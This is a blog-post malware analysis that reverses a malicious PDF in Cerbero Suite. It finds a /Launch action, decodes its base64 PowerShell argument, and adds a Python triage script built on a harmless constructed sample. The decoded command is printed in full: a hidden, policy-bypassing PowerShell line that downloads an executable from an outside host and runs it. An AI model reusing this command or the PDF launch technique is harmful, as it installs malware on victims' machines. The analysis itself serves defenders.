Reversing Malicious Document PDF

Hi Fellow Friends,

Finally, I can write on this blog again after some time focusing on other things. Today, I would like to write about reversing a malicious PDF to get detailed information about what it is trying to do to our endpoint.

Many tools could help you during analysis, but today I will use one integrated tool for file analysis called Cerbero Suite Advanced. I love this application because it gives the most functionality for file analysis.

Let’s get started. Open the malware sample by right-clicking on it and analyzing it with Cerbero.

Cerbero can fully parse the PDF data structure and show it in a structured way. We can see in the image below that Cerbero directly gives you hints that the file has a threat inside.

We can see that the PDF file has five objects. We can start analyzing the file from object number one. We can select the object from the format window.

Cerbero will give you information about the object in the raw data window.

We can understand that this object performs a /Launch /Win action when the document is opened. It shows that the PDF will start a PowerShell command with base64 encoding.

We can also see the hierarchy of the object in the tree tab, as shown below, which is clearer.

To analyze further what command will run, we can copy the item and paste it into the text analysis window.

Then open a new text window for analysis. We can see that PowerShell will execute an encoded command with the window style hidden. It is suspicious, right?

Let’s start decoding the base64 PowerShell command. It is straightforward to decode it with Cerbero: select the base64-encoded text, press CTRL+R, and select Base64 to bytes.

It will show you the result in the hexstring window.

Here is the full command that PowerShell executes on start:

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile(‘http://ncdugandaorg/css/aworiexe’, $env:APPDATA\aworiexe );Start-Process ( $env:APPDATA\aworiexe )

Now we can understand that PowerShell will download the malware from http://ncdugandaorg/css/aworiexe and execute it in a hidden window.
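The same triage steps (find the /Launch /Win action, pull out the base64 argument, decode it, list the URLs it references) can be scripted for bulk screening. This is an added example, not code from this post or from Cerbero; the sample PDF fragment, the command and the example.invalid URL are constructed, and all function names are hypothetical.

```python
import base64
import re

# Constructed sample: a harmless command encoded the way PowerShell's
# -EncodedCommand parameter expects it (base64 over UTF-16LE text).
SAMPLE_CMD = "Write-Output 'constructed sample http://example.invalid/sample.bin'"
SAMPLE_B64 = base64.b64encode(SAMPLE_CMD.encode("utf-16-le"))

# Constructed PDF fragment: an /OpenAction that is a /Launch action
# carrying a /Win dictionary.
SAMPLE_PDF = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /OpenAction << /S /Launch /Win "
    b"<< /F (cmd.exe) /P (/c powershell -windowstyle hidden -enc "
    + SAMPLE_B64 + b") >> >> >>\nendobj\n"
)

# Body of the /Win dictionary that follows a /Launch action type.
LAUNCH_RE = re.compile(rb"/S\s*/Launch\b.*?/Win\s*<<(.*?)>>", re.S)
# Matches -e, -ec, -enc ... -EncodedCommand, but not -ExecutionPolicy.
ENC_RE = re.compile(rb"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def find_launch_actions(pdf_bytes):
    """Return the raw /Win dictionary body of every /Launch action found."""
    return [m.group(1).strip() for m in LAUNCH_RE.finditer(pdf_bytes)]


def decode_encoded_command(win_dict):
    """Decode the base64 PowerShell argument, or return None if absent/invalid."""
    m = ENC_RE.search(win_dict)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(pdf_bytes):
    """One finding per /Launch action: raw parameters, decoded command, URLs."""
    findings = []
    for win in find_launch_actions(pdf_bytes):
        cmd = decode_encoded_command(win)
        findings.append({"win": win.decode("latin-1"), "decoded": cmd,
                         "urls": URL_RE.findall(cmd or "")})
    return findings
```

This scans raw bytes only, so objects stored in compressed object streams or written with hex-escaped names (for example `/L#61unch`) need to be decompressed and normalized first.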

I would like to encourage malware analysts to use Cerbero for file analysis. It has various features that make your life easier.


    1. There are certain PDF readers that have vulnerabilities in parsing/reading the data in PDF files, so they can be exploited to do RCE. There is also some built-in functionality of PDF that can be used to run malicious scripts.
